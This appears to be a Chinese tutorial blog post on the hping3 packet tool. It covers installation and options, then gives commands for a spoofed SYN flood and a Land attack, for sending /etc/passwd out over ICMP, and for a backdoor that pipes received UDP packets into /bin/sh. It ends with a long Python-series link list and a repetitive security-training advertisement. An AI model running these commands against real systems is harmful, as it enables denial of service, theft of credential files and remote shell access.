文章目录
- hping3
-
* 补充说明- 安装
- 选项
- Hping3功能
-
* 防火墙测试- 端口扫描
- Idle扫描
- 拒绝服务攻击
- 文件传输
- 木马功能
- 从零学
python
hping3
测试网络及主机的安全
补充说明
hping 是用于生成和解析TCPIP协议数据包的开源工具。创作者是Salvatore
Sanfilippo。目前最新版是hping3,支持使用tcl脚本自动化地调用其API。hping是安全审计、防火墙测试等工作的标配工具。hping优势在于能够定制数据包的各个部分,因此用户可以灵活对目标机进行细致地探测。
安装
yum install libpcap-devel tc-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget http://www.hping.org/hping3-20051105.tar.gz
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
./configure
make
make install
选项
-H, --help 显示帮助。
-v, -VERSION 版本信息。
-c, --count count 发送数据包的次数 关于countreached_timeout 可以在hping2.h里编辑。
-i, --interval 包发送间隔时间(单位是毫秒)缺省时间是1秒,此功能在增加传输率上很重要,在idle/spoofing扫描时此功能也会被用到,你可以参考hping-howto获得更多信息-fast 每秒发10个数据包。
-n, -nmeric 数字输出,象征性输出主机地址。
-q, -quiet 退出。
-I, --interface interface name 无非就是eth0之类的参数。
-v, --verbose 显示很多信息,TCP回应一般如:len=46 ip=192.168.1.1 flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0
-D, --debug 进入debug模式当你遇到麻烦时,比如用HPING遇到一些不合你习惯的时候,你可以用此模式修改HPING,(INTERFACE DETECTION,DATA LINK LAYER ACCESS,INTERFACE SETTINGS,.......)
-z, --bind 快捷键的使用。
-Z, --unbind 消除快捷键。
-O, --rawip RAWIP模式,在此模式下HPING会发送带数据的IP头。
-1, --icmp ICMP模式,此模式下HPING会发送IGMP应答报,你可以用--ICMPTYPE --ICMPCODE选项发送其他类型/模式的ICMP报文。
-2, --udp UDP 模式,缺省下,HPING会发送UDP报文到主机的0端口,你可以用--baseport --destport --keep选项指定其模式。
-9, --listen signatuer hping的listen模式,用此模式,HPING会接收指定的数据。
-a, --spoof hostname 伪造IP攻击,防火墙就不会记录你的真实IP了,当然回应的包你也接收不到了。
-t, --ttl time to live 可以指定发出包的TTL值。
-H, --ipproto 在RAW IP模式里选择IP协议。
-w, --WINID UNIX ,WINDIWS的id回应不同的,这选项可以让你的ID回应和WINDOWS一样。
-r, --rel 更改ID的,可以让ID曾递减输出,详见HPING-HOWTO。
-F, --FRAG 更改包的FRAG,这可以测试对方对于包碎片的处理能力,缺省的“virtual mtu”是16字节。
-x, --morefrag 此功能可以发送碎片使主机忙于恢复碎片而造成主机的拒绝服务。
-y, -dontfrag 发送不可恢复的IP碎片,这可以让你了解更多的MTU PATH DISCOVERY。
-G, --fragoff fragment offset value set the fragment offset
-m, --mtu mtu value 用此项后ID数值变得很大,50000没指定此项时3000-20000左右。
-G, --rroute 记录路由,可以看到详悉的数据等等,最多可以经过9个路由,即使主机屏蔽了ICMP报文。
-C, --ICMPTYPE type 指定ICMP类型,缺省是ICMP echo REQUEST。
-K, --ICMPCODE CODE 指定ICMP代号,缺省0。
--icmp-ipver 把IP版本也插入IP头。
--icmp-iphlen 设置IP头的长度,缺省为5(32字节)。
--icmp-iplen 设置IP包长度。
--icmp-ipid 设置ICMP报文IP头的ID,缺省是RANDOM。
--icmp-ipproto 设置协议的,缺省是TCP。
--icmp-cksum 设置校验和。
--icmp-ts alias for --icmptype 13 (to send ICMP timestamp requests)
--icmp-addr Alias for --icmptype 17 (to send ICMP address mask requests)
-s, --baseport source port hping 用源端口猜测回应的包,它从一个基本端口计数,每收一个包,端口也加1,这规则你可以自己定义。
-p, --deskport [+][+]desk port 设置目标端口,缺省为0,一个加号设置为:每发送一个请求包到达后,端口加1,两个加号为:每发一个包,端口数加1。
--keep 上面说过了。
-w, --win 发的大小和windows一样大,64BYTE。
-O, --tcpoff Set fake tcp data offset. Normal data offset is tcphdrlen / 4.
-m, --tcpseq 设置TCP序列数。
-l, --tcpck 设置TCP ack。
-Q, --seqnum 搜集序列号的,这对于你分析TCP序列号有很大作用。
Hping3功能
Hping3主要有以下典型功能应用:
防火墙测试
使用Hping3指定各种数据包字段,依次对防火墙进行详细测试。请参考:http://0daysecurity.com/articles/hping3_examples.html
测试防火墙对ICMP包的反应、是否支持traceroute、是否开放某个端口、对防火墙进行拒绝服务攻击(DoS
attack)。例如,以LandAttack方式测试目标防火墙(Land Attack是将发送源地址设置为与目标地址相同,诱使目标机与自己不停地建立连接)。
hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10
端口扫描
Hping3也可以对目标端口进行扫描。Hping3支持指定TCP各个标志位、长度等信息。以下示例可用于探测目标机的80端口是否开放:
hping3 -I eth0 -S 192.168.10.1 -p 80
其中-I eth0指定使用eth0端口,-S指定TCP包的标志位SYN,-p 80指定探测的目的端口。
hping3支持非常丰富的端口探测方式,nmap拥有的扫描方式hping3几乎都支持(除开connect方式,因为Hping3仅发送与接收包,不会维护连接,所以不支持connect方式探测)。而且Hping3能够对发送的探测进行更加精细的控制,方便用户微调探测结果。当然,Hping3的端口扫描性能及综合处理能力,无法与Nmap相比。一般使用它仅对少量主机的少量端口进行扫描。
Idle扫描
Idle扫描(Idle Scanning)是一种匿名扫描远程主机的方式,该方式也是有Hping3的作者Salvatore
Sanfilippo发明的,目前Idle扫描在Nmap中也有实现。
该扫描原理是:寻找一台idle主机(该主机没有任何的网络流量,并且IPID是逐个增长的),攻击端主机先向idle主机发送探测包,从回复包中获取其IPID。冒充idle主机的IP地址向远程主机的端口发送SYN包(此处假设为SYN包),此时如果远程主机的目的端口开放,那么会回复SYN/ACK,此时idle主机收到SYN/ACK后回复RST包。然后攻击端主机再向idle主机发送探测包,获取其IPID。那么对比两次的IPID值,我们就可以判断远程主机是否回复了数据包,从而间接地推测其端口状态。
拒绝服务攻击
使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接,伪造源地址为192.168.10.99,并使用1000微秒的间隔发送各个SYN包。
hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000
其他攻击如smurf、teardrop、land attack等也很容易构建出来。
文件传输
Hping3支持通过TCP/UDP/ICMP等包来进行文件传输。相当于借助TCP/UDP/ICMP包建立隐秘隧道通讯。实现方式是开启监听端口,对检测到的签名(签名为用户指定的字符串)的内容进行相应的解析。在接收端开启服务:
hping3 192.168.1.159--listen signature --safe --icmp
监听ICMP包中的签名,根据签名解析出文件内容。
在发送端使用签名打包的ICMP包发送文件:
hping3 192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd
将/etc/passwd密码文件通过ICMP包传给192.168.10.44主机。发送包大小为100字节(-d
100),发送签名为signature(-sign signature)。
木马功能
如果Hping3能够在远程主机上启动,那么可以作为木马程序启动监听端口,并在建立连接后打开shell通信。与netcat的后门功能类似。
示例:本地打开53号UDP端口(DNS解析服务)监听来自192.168.10.66主机的包含签名为signature的数据包,并将收到的数据调用/bin/sh执行。
在木马启动端:
hping3 192.168.10.66--listen signature --safe --udp -p 53 | /bin/sh
在远程控制端:
echo ls >test.cmd
hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd
将包含ls命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口,包数据长度为100字节。
当然这里只是简单的演示程序,真实的场景,控制端可以利益shell执行很多的高级复杂的操作。
从零学 python
【从零学习python
】92.使用Python的requests库发送HTTP请求和处理响应
【从零学习python 】91.
使用装饰器和字典管理请求路径的简洁Web应用
【从零学习python
】93.使用字典管理请求路径
【从零学习python 】89.
使用WSGI搭建简单高效的Web服务器
【从零学习python 】88.
WSGI接口详解:实现简单高效的Web开发
【从零学习python 】87.
手动搭建HTTP服务器的Python实现及多线程并发处理
【从零学习python 】86.
深入了解HTTP协议及其在浏览器和服务器通信中的作用
【从零学习python
】85.Python进程池的并行计算技术应用
【从零学习python
】84.深入理解线程和进程
【从零学习python 】83.
Python多进程编程与进程池的使用
【从零学习python 】82.
基于多线程的聊天程序实现
【从零学习python
】81.Python多线程通信与队列的应用
【从零学习python
】80.线程访问全局变量与线程安全问题
【从零学习python 】79.
线程访问全局变量与线程安全问题
【从零学习python 】78.
文件下载案例
【从零学习python 】77.
TCP服务端编程及注意事项
【从零学习python
】76.服务器与客户端:网络通信的关键组成部分
【从零学习python 】75.
TCP协议:可靠的面向连接的传输层通信协议
【从零学习python 】74.
UDP网络程序:端口问题与绑定信息详解
【从零学习python 】73. UDP网络程序-
发送数据
【从零学习python 】72.
深入理解Socket通信及创建套接字的方法
【从零学习python 】71.
网络端口及其作用
【从零学习python
】70.网络通信方式及其应用:从直接通信到路由器连接多个网络
【从零学习python 】69.
网络通信及IP地址分类解析
【从零学习python 】68.
Python正则表达式中的贪婪和非贪婪模式
【从零学习python
】67.Python中的re模块:正则替换与高级匹配技术
【从零学习python
】66.深入了解正则表达式:模式匹配与文本处理的利器
【从零学习python 】65.
Python正则表达式修饰符及其应用详解
【从零学习python 】64.
Python正则表达式中re.compile方法的使用详解
【从零学习python
】63.正则表达式中的re.Match类及其属性和方法介绍
【从零学习python 】62.
Python正则表达式:强大的字符串匹配工具
【从零学习python
】61.Python中的property属性详解和应用示例
【从零学习python
】60.探索生成器:迭代的灵活利器
【从零学习python
】59.迭代器:优化数据遍历的高效工具
【从零学习python
】58.Python中的自定义异常及引发异常的方法
【从零学习python
】57.Python中使用with关键字正确关闭资源
【从零学习python 】56.
异常处理在程序设计中的重要性与应用
【从零学习python
】55.Python中的序列化和反序列化,JSON与pickle模块的应用
【从零学习python 】54.
内存中写入数据
【从零学习python 】53.
CSV文件和Python的CSV模块
【从零学习python 】52.文件的读写 -
Python文件操作指南
【从零学习python
】51.文件的打开与关闭及其在Python中的应用
【从零学习python 】49.
Python中对象相关的内置函数及其用法
【从零学习python
】48.Python中的继承与多继承详解
【从零学习python 】47.
面向对象编程中的继承概念及基本使用
【从零学习python 】46.
Python中的__new__和__init__方法解析及单例设计模式
【从零学习python
】45.Python中的类方法和静态方法
【从零学习python
】44.面向对象编程中的私有属性和方法
【从零学习python 】43.
Python面向对象编程中的实例属性和类属性
【从零学习python
】42.Python中的内置属性和方法
【从零学习python
】41.python魔法方法(二)
【从零学习python
】40.python魔法方法(一)
【从零学习python
】39.面向对象基本语法及应用示例
【从零学习python
】38.Python包的使用及导入方式
【从零学习python
】37.Python自定义模块的使用和注意事项
【从零学习python
】36.Python中使用pip进行第三方包管理的方法与技巧
【从零学习python 】35.
Python常见系统模块及其用法
【从零学习python
】34.Python模块的导入和使用方法详解
【从零学习python
】33.装饰器的作用(二)
【从零学习python
】32.装饰器的作用(一)
【从零学习python
】31.深入理解Python中的高阶函数和闭包
【从零学习python
】30.深入理解递归函数和匿名函数
【从零学习python 】29.
「函数参数详解」——了解Python函数参数的不同用法
【从零学习python 】28.
Python中的局部变量和全局变量
【从零学习python 】27. Python
函数的使用及嵌套调用
【从零学习python
】25.函数:提高代码编写效率的利器
【从零学习python 】24.
Python中的字符串操作与遍历方法
【从零学习python 】23.
Python中集合(set)的使用方法和常见操作
【从零学习python 】22.
Python中的字典的增删改查及字典的变量
【从零学习python
】21.Python中的元组与字典
【从零学习python 】20.
Python列表操作技巧及实例
【从零学习python 】19.
循环遍历列表和列表嵌套的应用
【从零学习python 】18.
Python列表的基本操作详解(一)
【从零学习python 】17.
Python字符串的format方法(二)
【从零学习python 】16.
Python字符串的format方法(一)
【从零学习python
】15.深入了解字符串及字符集编码
【从零学习python
】14.Python字符串常见操作(二)
【从零学习python
】13.Python字符串常见操作(一)
【从零学习python
】12.Python字符串操作与应用
【从零学习python
】11.Python循环语句和控制流程
【从零学习python
】10.Python条件语句和if嵌套详解
【从零学习python 】09.Python
中的条件判断语句
【从零学习python 】08.Python了解位运算符,
运算符优先级
【从零学习python
】07.Python运算符详解:赋值、比较和逻辑运算符
【从零学习python 】06.
Python中运用算数运算符进行计算和字符串拼接
【从零学习python 】05.
Python中的输出和输入
【从零学习python 】04.
Python编程基础:变量、数据类型与标识符
【从零学习python 】03.
Python交互式编程及注释详解
【从零学习python 】02.
开发工具介绍
【从零学习python 】01.
安装配置python
题外话
初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:
2023届全国高校毕业生预计达到1158万人,就业形势严峻;
国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。
一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。
6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。
2022届大学毕业生月收入较高的前10个专业
本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。
具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。
网络安全行业特点
1、就业薪资非常高,涨薪快 2022年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!
2、人才缺口大,就业机会多
2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。
行业发展空间大,岗位非常多
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。
随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
行业发展空间大,岗位非常多
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。
随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!学习网络安全技术的方法无非三种:
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。
第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
第三种就是去找培训。
接下来,我会教你零基础入门快速入门上手网络安全。
网络安全入门到底是先学编程还是先学计算机基础?这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又或者急于转行的人来说,学习编程或者计算机基础对他们来说都有一定的难度,并且花费时间太长。
第一阶段:基础准备 4周~6周
这个阶段是所有准备进入安全行业必学的部分,俗话说:基础不劳,地动山摇
第二阶段:web渗透
学习基础 时间:1周 ~ 2周:
① 了解基本概念:(SQL注入、XSS、上传、CSRF、一句话木马、等)为之后的WEB渗透测试打下基础。
② 查看一些论坛的一些Web渗透,学一学案例的思路,每一个站点都不一样,所以思路是主要的。
③ 学会提问的艺术,如果遇到不懂得要善于提问。
配置渗透环境 时间:3周 ~ 4周:
① 了解渗透测试常用的工具,例如(AWVS、SQLMAP、NMAP、BURP、中国菜刀等)。
② 下载这些工具无后门版本并且安装到计算机上。
③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
渗透实战操作 时间:约6周:
① 在网上搜索渗透实战案例,深入了解SQL注入、文件上传、解析漏洞等在实战中的使用。
② 自己搭建漏洞环境测试,推荐DWVA,SQLi-labs,Upload-labs,bWAPP。
③ 懂得渗透测试的阶段,每一个阶段需要做那些动作:例如PTES渗透测试执行标准。
④ 深入研究手工SQL注入,寻找绕过waf的方法,制作自己的脚本。
⑤ 研究文件上传的原理,如何进行截断、双重后缀欺骗(IIS、PHP)、解析漏洞利用(IIS、Nignix、Apache)等,参照:上传攻击框架。
⑥ 了解XSS形成原理和种类,在DWVA中进行实践,使用一个含有XSS漏洞的cms,安装安全狗等进行测试。
⑦ 了解一句话木马,并尝试编写过狗一句话。
⑧ 研究在Windows和Linux下的提升权限,Google关键词:提权
以上就是入门阶段
第三阶段:进阶
已经入门并且找到工作之后又该怎么进阶?详情看下图
给新手小白的入门建议:
新手入门学习最好还是从视频入手进行学习,视频的浅显易懂相比起晦涩的文字而言更容易吸收,这里我给大家准备了一套网络安全从入门到精通的视频学习资料包免费领取哦!
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
790
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
